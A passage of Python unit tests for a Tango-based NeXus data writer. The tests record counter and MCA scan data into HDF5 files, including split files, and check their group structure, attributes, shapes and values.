self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
mca = dt.open("data")
self.assertTrue(mca.is_valid)
self.assertEqual(mca.name, "data")
# self.assertEqual(mca.name,"mca")
self.assertTrue(hasattr(cnt.shape, "__iter__"))
self.assertEqual(len(mca.shape), 2)
# self.assertEqual(mca.shape, (2,2048))
self.assertEqual(mca.dtype, "float64")
# self.assertEqual(mca.size, 4096)
mca.read()
# for i in range(len(value[0])):
# self.assertEqual(self._mca1[i], value[0][i])
# for i in range(len(value[0])):
# self.assertEqual(self._mca2[i], value[1][i])
self.assertEqual(len(mca.attributes), 4)
at = cnt.attributes["nexdatas_strategy"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "nexdatas_strategy")
self.assertEqual(at[...], "STEP")
at = mca.attributes["type"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "type")
self.assertEqual(at[...], "NX_FLOAT")
at = mca.attributes["units"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "units")
self.assertEqual(at[...], "")
at = mca.attributes["nexdatas_source"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
f.close()
finally:
if os.path.isfile(fname):
os.remove(fname)
# scanRecord test
# \brief It tests recording of simple h5 file
def test_scanRecordGrow2(self):
fun = sys._getframe().f_code.co_name
print("Run: %s.%s() " % (self.__class__.__name__, fun))
fname = '%s/scantest2.h5' % os.getcwd()
try:
dp = PyTango.DeviceProxy(self._sv.device)
self.assertTrue(ProxyHelper.wait(dp, 10000))
# print 'attributes', dp.attribute_list_query()
self.setProp(dp, "writer", "h5cpp")
dp.FileName = fname
self.assertEqual(dp.state(), PyTango.DevState.ON)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.OpenFile()
self.assertEqual(dp.state(), PyTango.DevState.OPEN)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.XMLSettings = self._scanXml % fname
self.assertEqual(dp.state(), PyTango.DevState.OPEN)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.OpenEntry()
self.assertEqual(dp.state(), PyTango.DevState.EXTRACT)
self.assertEqual(dp.status(), self.__status[dp.state()])
cntg = [self._counter[0], self._counter[1]]
mcag = [self._mca1, self._mca2]
rec = {"data": {"exp_c01": cntg, "p09/mca/exp.02": mcag}}
dp.Record(json.dumps(rec))
self.assertEqual(dp.state(), PyTango.DevState.EXTRACT)
self.assertEqual(dp.status(), self.__status[dp.state()])
cntg = [self._counter[1], self._counter[0]]
mcag = [self._mca2, self._mca1]
rec = {"data": {"exp_c01": cntg, "p09/mca/exp.02": mcag}}
dp.Record(json.dumps(rec))
dp.CloseEntry()
self.assertEqual(dp.state(), PyTango.DevState.OPEN)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.CloseFile()
self.assertEqual(dp.state(), PyTango.DevState.ON)
self.assertEqual(dp.status(), self.__status[dp.state()])
# check the created file
f = H5CppWriter.open_file(fname, readonly=True)
f = f.root()
self.assertEqual(5, len(f.attributes))
self.assertEqual(f.attributes["file_name"][...], fname)
self.assertTrue(f.attributes["NX_class"][...], "NXroot")
self.assertEqual(f.size, 2)
en = f.open("entry1")
self.assertTrue(en.is_valid)
self.assertEqual(en.name, "entry1")
self.assertEqual(len(en.attributes), 1)
self.assertEqual(en.size, 2)
at = en.attributes["NX_class"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "NX_class")
self.assertEqual(at[...], "NXentry")
# ins = f.open("entry1/instrument:NXinstrument") # bad exception
# ins = f.open("entry1/instrument")
ins = en.open("instrument")
self.assertTrue(ins.is_valid)
self.assertEqual(ins.name, "instrument")
self.assertEqual(len(ins.attributes), 2)
self.assertEqual(ins.size, 1)
at = ins.attributes["NX_class"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "NX_class")
self.assertEqual(at[...], "NXinstrument")
at = ins.attributes["short_name"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "short_name")
self.assertEqual(at[...], "scan instrument")
det = ins.open("detector")
self.assertTrue(det.is_valid)
self.assertEqual(det.name, "detector")
self.assertEqual(len(det.attributes), 1)
self.assertEqual(det.size, 2)
at = det.attributes["NX_class"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "NX_class")
self.assertEqual(at[...], "NXdetector")
# cnt = det.open("counter") # bad exception
cnt = det.open("counter1")
self.assertTrue(cnt.is_valid)
self.assertEqual(cnt.name, "counter1")
self.assertTrue(hasattr(cnt.shape, "__iter__"))
self.assertEqual(len(cnt.shape), 1)
self.assertEqual(cnt.shape, (4,))
self.assertEqual(cnt.dtype, "float64")
self.assertEqual(cnt.size, 4)
value = cnt.read()
# value = cnt[:]
for i in range(len(value)):
self.assertEqual(
self._counter[i if i < 2 else 3 - i], value[i])
self.assertEqual(len(cnt.attributes), 4)
at = cnt.attributes["nexdatas_strategy"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "nexdatas_strategy")
self.assertEqual(at[...], "STEP")
at = cnt.attributes["type"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "type")
self.assertEqual(at[...], "NX_FLOAT")
at = cnt.attributes["units"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "units")
self.assertEqual(at[...], "m")
at = cnt.attributes["nexdatas_source"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
mca = det.open("mca")
self.assertTrue(mca.is_valid)
self.assertEqual(mca.name, "mca")
self.assertTrue(hasattr(cnt.shape, "__iter__"))
self.assertEqual(len(mca.shape), 2)
self.assertEqual(mca.shape, (4, 2048))
self.assertEqual(mca.dtype, "float64")
self.assertEqual(mca.size, 8192)
value = mca.read()
for i in range(len(value[0])):
self.assertEqual(self._mca1[i], value[0][i])
for i in range(len(value[0])):
self.assertEqual(self._mca2[i], value[1][i])
for i in range(len(value[0])):
self.assertEqual(self._mca1[i], value[3][i])
for i in range(len(value[0])):
self.assertEqual(self._mca2[i], value[2][i])
self.assertEqual(len(mca.attributes), 4)
at = cnt.attributes["nexdatas_strategy"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "nexdatas_strategy")
self.assertEqual(at[...], "STEP")
at = mca.attributes["type"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "type")
self.assertEqual(at[...], "NX_FLOAT")
at = mca.attributes["units"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "units")
self.assertEqual(at[...], "")
at = mca.attributes["nexdatas_source"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
dt = en.open("data")
self.assertTrue(dt.is_valid)
self.assertEqual(dt.name, "data")
self.assertEqual(len(dt.attributes), 1)
self.assertEqual(dt.size, 2)
at = dt.attributes["NX_class"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "NX_class")
self.assertEqual(at[...], "NXdata")
cnt = dt.open("counter1")
self.assertTrue(cnt.is_valid)
# ???
# self.assertEqual(cnt.name,"cnt1")
self.assertEqual(cnt.name, "counter1")
self.assertTrue(hasattr(cnt.shape, "__iter__"))
self.assertEqual(len(cnt.shape), 1)
self.assertEqual(cnt.shape, (4,))
self.assertEqual(cnt.dtype, "float64")
self.assertEqual(cnt.size, 4)
# print(cnt.read())
value = cnt[:]
for i in range(len(value)):
self.assertEqual(
self._counter[i if i < 2 else 3 - i], value[i])
self.assertEqual(len(cnt.attributes), 4)
at = cnt.attributes["nexdatas_strategy"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "nexdatas_strategy")
self.assertEqual(at[...], "STEP")
at = cnt.attributes["type"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "type")
self.assertEqual(at[...], "NX_FLOAT")
at = cnt.attributes["units"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "units")
self.assertEqual(at[...], "m")
at = cnt.attributes["nexdatas_source"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
mca = dt.open("data")
self.assertTrue(mca.is_valid)
self.assertEqual(mca.name, "data")
self.assertTrue(hasattr(cnt.shape, "__iter__"))
self.assertEqual(len(mca.shape), 2)
self.assertEqual(mca.shape, (4, 2048))
self.assertEqual(mca.dtype, "float64")
self.assertEqual(mca.size, 8192)
value = mca.read()
for i in range(len(value[0])):
self.assertEqual(self._mca1[i], value[0][i])
for i in range(len(value[0])):
self.assertEqual(self._mca2[i], value[1][i])
for i in range(len(value[0])):
self.assertEqual(self._mca1[i], value[3][i])
for i in range(len(value[0])):
self.assertEqual(self._mca2[i], value[2][i])
self.assertEqual(len(mca.attributes), 4)
at = cnt.attributes["nexdatas_strategy"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "nexdatas_strategy")
self.assertEqual(at[...], "STEP")
at = mca.attributes["type"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "type")
self.assertEqual(at[...], "NX_FLOAT")
at = mca.attributes["units"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "units")
self.assertEqual(at[...], "")
at = mca.attributes["nexdatas_source"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
f.close()
finally:
if os.path.isfile(fname):
os.remove(fname)
# scanRecord test
# \brief It tests recording of simple h5 file
def test_scanRecord_split(self):
fun = sys._getframe().f_code.co_name
print("Run: %s.%s() " % (self.__class__.__name__, fun))
tfname = '%s/%s%s.h5' % (os.getcwd(), self.__class__.__name__, fun)
fname = None
try:
dp = PyTango.DeviceProxy(self._sv.device)
self.assertTrue(ProxyHelper.wait(dp, 10000))
# print 'attributes', dp.attribute_list_query()
self.setProp(dp, "writer", "h5cpp")
dp.FileName = tfname
dp.stepsPerFile = 2
self.assertEqual(dp.stepsperfile, 2)
self.assertEqual(dp.currentfileid, 0)
self.assertEqual(dp.state(), PyTango.DevState.ON)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.OpenFile()
self.assertEqual(dp.stepsperfile, 2)
self.assertEqual(dp.currentfileid, 0)
self.assertEqual(dp.state(), PyTango.DevState.OPEN)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.XMLSettings = self._scanXml1
self.assertEqual(dp.state(), PyTango.DevState.OPEN)
self.assertEqual(dp.stepsperfile, 2)
self.assertEqual(dp.currentfileid, 0)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.OpenEntry()
self.assertEqual(dp.stepsperfile, 2)
self.assertEqual(dp.currentfileid, 1)
self.assertEqual(dp.state(), PyTango.DevState.EXTRACT)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.Record('{"data": {"exp_c01":' + str(self._counter[0]) +
', "p09/mca/exp.02":' +
str(self._mca1) + ' } }')
self.assertEqual(dp.stepsperfile, 2)
self.assertEqual(dp.currentfileid, 1)
self.assertEqual(dp.state(), PyTango.DevState.EXTRACT)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.Record('{"data": {"exp_c01":' + str(self._counter[1]) +
', "p09/mca/exp.02":' +
str(self._mca2) + ' } }')
self.assertEqual(dp.stepsperfile, 2)
self.assertEqual(dp.currentfileid, 2)
self.assertEqual(dp.state(), PyTango.DevState.EXTRACT)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.Record('{"data": {"exp_c01":' + str(self._counter[1]) +
', "p09/mca/exp.02":' +
str(self._mca2) + ' } }')
self.assertEqual(dp.stepsperfile, 2)
self.assertEqual(dp.currentfileid, 2)
self.assertEqual(dp.state(), PyTango.DevState.EXTRACT)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.Record('{"data": {"exp_c01":' + str(self._counter[1]) +
', "p09/mca/exp.02":' +
str(self._mca2) + ' } }')
self.assertEqual(dp.stepsperfile, 2)
self.assertEqual(dp.currentfileid, 3)
self.assertEqual(dp.state(), PyTango.DevState.EXTRACT)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.Record('{"data": {"exp_c01":' + str(self._counter[1]) +
', "p09/mca/exp.02":' +
str(self._mca2) + ' } }')
self.assertEqual(dp.stepsperfile, 2)
self.assertEqual(dp.currentfileid, 3)
self.assertEqual(dp.state(), PyTango.DevState.EXTRACT)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.Record('{"data": {"exp_c01":' + str(self._counter[0]) +
', "p09/mca/exp.02":' +
str(self._mca1) + ' } }')
self.assertEqual(dp.stepsperfile, 2)
self.assertEqual(dp.currentfileid, 4)
self.assertEqual(dp.state(), PyTango.DevState.EXTRACT)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.CloseEntry()
self.assertEqual(dp.stepsperfile, 2)
self.assertEqual(dp.currentfileid, 1)
self.assertEqual(dp.state(), PyTango.DevState.OPEN)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.CloseFile()
self.assertEqual(dp.stepsperfile, 2)
self.assertEqual(dp.currentfileid, 0)
self.assertEqual(dp.state(), PyTango.DevState.ON)
self.assertEqual(dp.status(), self.__status[dp.state()])
# check the created file
fname = '%s/%s%s_00001.h5' % (
os.getcwd(), self.__class__.__name__, fun)
f = H5CppWriter.open_file(fname, readonly=True)
f = f.root()
self.assertEqual(5, len(f.attributes))
self.assertEqual(f.attributes["file_name"][...], fname)
self.assertTrue(f.attributes["NX_class"][...], "NXroot")
self.assertEqual(f.size, 2)
en = f.open("entry1")
self.assertTrue(en.is_valid)
self.assertEqual(en.name, "entry1")
self.assertEqual(len(en.attributes), 1)
self.assertEqual(en.size, 2)
at = en.attributes["NX_class"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "NX_class")
self.assertEqual(at[...], "NXentry")
# ins = f.open("entry1/instrument:NXinstrument") #bad exception
# ins = f.open("entry1/instrument")
ins = en.open("instrument")
self.assertTrue(ins.is_valid)
self.assertEqual(ins.name, "instrument")
self.assertEqual(len(ins.attributes), 2)
self.assertEqual(ins.size, 1)
at = ins.attributes["NX_class"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "NX_class")
self.assertEqual(at[...], "NXinstrument")
at = ins.attributes["short_name"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "short_name")
self.assertEqual(at[...], "scan instrument")
det = ins.open("detector")
self.assertTrue(det.is_valid)
self.assertEqual(det.name, "detector")
self.assertEqual(len(det.attributes), 1)
self.assertEqual(det.size, 2)
at = det.attributes["NX_class"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "NX_class")
self.assertEqual(at[...], "NXdetector")
# cnt = det.open("counter") # bad exception
cnt = det.open("counter1")
self.assertTrue(cnt.is_valid)
self.assertEqual(cnt.name, "counter1")
self.assertTrue(hasattr(cnt.shape, "__iter__"))
self.assertEqual(len(cnt.shape), 1)
self.assertEqual(cnt.shape, (2,))
self.assertEqual(cnt.dtype, "float64")
self.assertEqual(cnt.size, 2)
value = cnt.read()
# value = cnt[:]
for i in range(len(value)):
self.assertEqual(self._counter[i], value[i])
self.assertEqual(len(cnt.attributes), 4)
at = cnt.attributes["nexdatas_strategy"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "nexdatas_strategy")
self.assertEqual(at[...], "STEP")
at = cnt.attributes["type"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "type")
self.assertEqual(at[...], "NX_FLOAT")
at = cnt.attributes["units"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "units")
self.assertEqual(at[...], "m")
at = cnt.attributes["nexdatas_source"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
mca = det.open("mca")
self.assertTrue(mca.is_valid)
self.assertEqual(mca.name, "mca")
self.assertTrue(hasattr(cnt.shape, "__iter__"))
self.assertEqual(len(mca.shape), 2)
self.assertEqual(mca.shape, (2, 2048))
self.assertEqual(mca.dtype, "float64")
self.assertEqual(mca.size, 4096)
value = mca.read()
for i in range(len(value[0])):
self.assertEqual(self._mca1[i], value[0][i])
for i in range(len(value[0])):
self.assertEqual(self._mca2[i], value[1][i])
self.assertEqual(len(mca.attributes), 4)
at = cnt.attributes["nexdatas_strategy"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "nexdatas_strategy")
self.assertEqual(at[...], "STEP")
at = mca.attributes["type"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "type")
self.assertEqual(at[...], "NX_FLOAT")
at = mca.attributes["units"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "units")
self.assertEqual(at[...], "")
at = mca.attributes["nexdatas_source"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
dt = en.open("data")
self.assertTrue(dt.is_valid)
self.assertEqual(dt.name, "data")
self.assertEqual(len(dt.attributes), 1)
self.assertEqual(dt.size, 2)
at = dt.attributes["NX_class"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "NX_class")
self.assertEqual(at[...], "NXdata")
cnt = dt.open("cnt1")
self.assertTrue(cnt.is_valid)
# ???
self.assertEqual(cnt.name, "cnt1")
# self.assertEqual(cnt.name,"counter1")
self.assertTrue(hasattr(cnt.shape, "__iter__"))
self.assertEqual(len(cnt.shape), 1)
self.assertEqual(cnt.shape, (2,))
self.assertEqual(cnt.dtype, "float64")
self.assertEqual(cnt.size, 2)
# print(cnt.read())
value = cnt[:]
for i in range(len(value)):
self.assertEqual(self._counter[i], value[i])
self.assertEqual(len(cnt.attributes), 4)
at = cnt.attributes["nexdatas_strategy"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "nexdatas_strategy")
self.assertEqual(at[...], "STEP")
at = cnt.attributes["type"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "type")
self.assertEqual(at[...], "NX_FLOAT")
at = cnt.attributes["units"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "units")
self.assertEqual(at[...], "m")
at = cnt.attributes["nexdatas_source"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
mca = dt.open("data")
self.assertTrue(mca.is_valid)
self.assertEqual(mca.name, "data")
self.assertTrue(hasattr(cnt.shape, "__iter__"))
self.assertEqual(len(mca.shape), 2)
self.assertEqual(mca.shape, (2, 2048))
self.assertEqual(mca.dtype, "float64")
self.assertEqual(mca.size, 4096)
value = mca.read()
for i in range(len(value[0])):
self.assertEqual(self._mca1[i], value[0][i])
for i in range(len(value[0])):
self.assertEqual(self._mca2[i], value[1][i])
self.assertEqual(len(mca.attributes), 4)
at = cnt.attributes["nexdatas_strategy"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "nexdatas_strategy")
self.assertEqual(at[...], "STEP")
at = mca.attributes["type"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "type")
self.assertEqual(at[...], "NX_FLOAT")
at = mca.attributes["units"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "units")
self.assertEqual(at[...], "")
at = mca.attributes["nexdatas_source"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
f.close()
# check the created file
fname = '%s/%s%s_00002.h5' % (
os.getcwd(), self.__class__.__name__, fun)
f = H5CppWriter.open_file(fname, readonly=True)
f = f.root()
self.assertEqual(5, len(f.attributes))
self.assertEqual(f.attributes["file_name"][...], fname)
self.assertTrue(f.attributes["NX_class"][...], "NXroot")
self.assertEqual(f.size, 2)
en = f.open("entry1")
self.assertTrue(en.is_valid)
self.assertEqual(en.name, "entry1")
self.assertEqual(len(en.attributes), 1)
self.assertEqual(en.size, 2)
at = en.attributes["NX_class"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "NX_class")
self.assertEqual(at[...], "NXentry")
# ins = f.open("entry1/instrument:NXinstrument") #bad exception
# ins = f.open("entry1/instrument")
ins = en.open("instrument")
self.assertTrue(ins.is_valid)
self.assertEqual(ins.name, "instrument")
self.assertEqual(len(ins.attributes), 2)
self.assertEqual(ins.size, 1)
at = ins.attributes["NX_class"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "NX_class")
self.assertEqual(at[...], "NXinstrument")
at = ins.attributes["short_name"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "short_name")
self.assertEqual(at[...], "scan instrument")
det = ins.open("detector")
self.assertTrue(det.is_valid)
self.assertEqual(det.name, "detector")
self.assertEqual(len(det.attributes), 1)
self.assertEqual(det.size, 2)
at = det.attributes["NX_class"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "NX_class")
self.assertEqual(at[...], "NXdetector")
# cnt = det.open("counter") # bad exception
cnt = det.open("counter1")
self.assertTrue(cnt.is_valid)
self.assertEqual(cnt.name, "counter1")
self.assertTrue(hasattr(cnt.shape, "__iter__"))
self.assertEqual(len(cnt.shape), 1)
self.assertEqual(cnt.shape, (2,))
self.assertEqual(cnt.dtype, "float64")
self.assertEqual(cnt.size, 2)
value = cnt.read()
# value = cnt[:]
for i in range(len(value)):
self.assertEqual(self._counter[1], value[i])
self.assertEqual(len(cnt.attributes), 4)
at = cnt.attributes["nexdatas_strategy"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "nexdatas_strategy")
self.assertEqual(at[...], "STEP")
at = cnt.attributes["type"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "type")
self.assertEqual(at[...], "NX_FLOAT")
at = cnt.attributes["units"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "units")
self.assertEqual(at[...], "m")
at = cnt.attributes["nexdatas_source"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
mca = det.open("mca")
self.assertTrue(mca.is_valid)
self.assertEqual(mca.name, "mca")
self.assertTrue(hasattr(cnt.shape, "__iter__"))
self.assertEqual(len(mca.shape), 2)
self.assertEqual(mca.shape, (2, 2048))
self.assertEqual(mca.dtype, "float64")
self.assertEqual(mca.size, 4096)
value = mca.read()
for i in range(len(value[0])):
self.assertEqual(self._mca2[i], value[0][i])
for i in range(len(value[0])):
self.assertEqual(self._mca2[i], value[1][i])
